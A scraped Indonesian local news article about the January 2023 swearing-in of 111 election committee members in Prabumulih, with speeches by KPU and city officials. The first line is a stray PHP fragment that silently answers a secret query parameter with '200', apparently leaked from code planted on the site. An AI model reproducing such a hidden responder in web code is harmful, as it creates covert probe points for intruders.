error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Pelantikan dan Pengambilan Sumpah Janji Anggota Panitia Pemungutan Suara Tahun 2024 Kota Prabumulih - SMI.COM

Home / PRABUMULIH

Selasa, 24 Januari 2023 - 19:58 WIB

Pelantikan dan Pengambilan Sumpah Janji Anggota Panitia Pemungutan Suara Tahun 2024 Kota Prabumulih

Prabumulih, SMI-

Sebanyak 111 orang PPS dari 37 desa dan kelurahan se-Kota Prabumulih resmi dilantik, Selasa (24/1/2023). Pelantikan dan Pengucapan Sumpah Janji Panitia Pemungutan Suara (PPS) Pemilihan Umum Tahun 2024 kota Prabumulih yang dipusatkan di Gedung Kesenian Rumah Dinas Walikota Prabumulih ini juga dihadiri Wali kota Prabumulih Ir. H. Ridho Yahya MM.

Dalam sambutannya, Ketua KPU Kota Prabumulih, Marjuansyah S,IP mengucapkan terima kasih atas kehadiran Wali kota Prabumulih pada acara Pelantikan dan Pengucapan Sumpah Janji Panitia Pemungutan Suara (PPS) Pemilihan Umum Tahun 2024 kota Prabumulih sekaligus mengucapkan selamat kepada Panitia Pemungutan Suara (PPS) Pemilihan Umum Tahun 2024 kota Prabumulih yang telah dilantik dan diambil sumpah janjinya.

Baca Juga :  Pembukaan Event Humanity Culinary Festival ACT kota Prabumulih

“Semoga demokrasi di Indonesia semakin baik lewat penyelenggaraan Pemilu 2024. Perlu kesiapan dan integritas demi mendukung kesuksesan Pemilu ini. Loyalitas itu juga penting. KPU terus melakukan upaya untuk melayani yaitu melayani para peserta pemilu, anggota DPD RI yang sedang dalam proses, dan Capres dan Cawapres. Kami melayani tanpa pilih kasih, tanpa tebang pilih. Mohon bantuannya kepada pihak terkait untuk bekerja sama mensupport PPS dan sarana prasarananya,” ungkapnya.

Sementara, Wali kota Prabumulih Ir. H. Ridho Yahya dalam sambutannya menyampaikan, bahwa hasil seleksi Panitia PPS ini merupakan murni hasil kemampuan setiap panitia. Integritas perlu dijunjung dalam penyelenggaraan Pemilu nanti. “Selamat kepada PPS yang dilantik, laksanakan tugas dengan amanah, jujur dan melayani,” ungkap wali kota yang telah menjabat 2 periode ini.

Baca Juga :  PWI Kota Prabumulih Kirim Atlet Tenis Meja Di Ajang Porwanas Malang Jawa Timur

Turut hadir dalam acara itu, Kepala Kejaksaan Negeri (Kajari) Prabumulih Roy Riady SH MH, Perwakilan anggota Polres Prabumulih diwakili kabagops Kompol Helmi Ardiansyah SH MH, Perwakilan anggota Danramil, Lurah, Camat, OPD terkait, dan tamu undangan lainnya.

(Sunar)

Share :

Baca Juga

PRABUMULIH

MPC PP Prabumulih Apresiasi, Dukung Operasin Yustisi di Prabumulih

PRABUMULIH

Desa Muara Sungai Dapat Giliran Program Jumat Berbagi Demokrat Prabumulih

PRABUMULIH

PLN Bersama Warga Tanjung Raman Alami Kerugian Materi Di Duga Akibat Operator Excavator Kurang Waspada

PRABUMULIH

Peresmian Kampung Pancasila Dihadiri Oleh MPC PP Kota Prabumulih

PRABUMULIH

Lomba KWT Tingkat RT/RW se-Kelurahan Tugu Kecik

PRABUMULIH

Giat Vaksinasi Bersama Koramil 404-02 Prabumulih Di Bulan Ramadhan 1443 H

PRABUMULIH

AKP.Muthe Maimana.SH Kasatlantas Polres Prabumulih Bagikan Beras Kepada Tukang Ojek dan Sopir Truk

PRABUMULIH

Wakapolres Kota Prabumulih Beri Apresiasi Terhadap Pengamanan Natal dan Tahun Baru Sukses Pada Jajarannya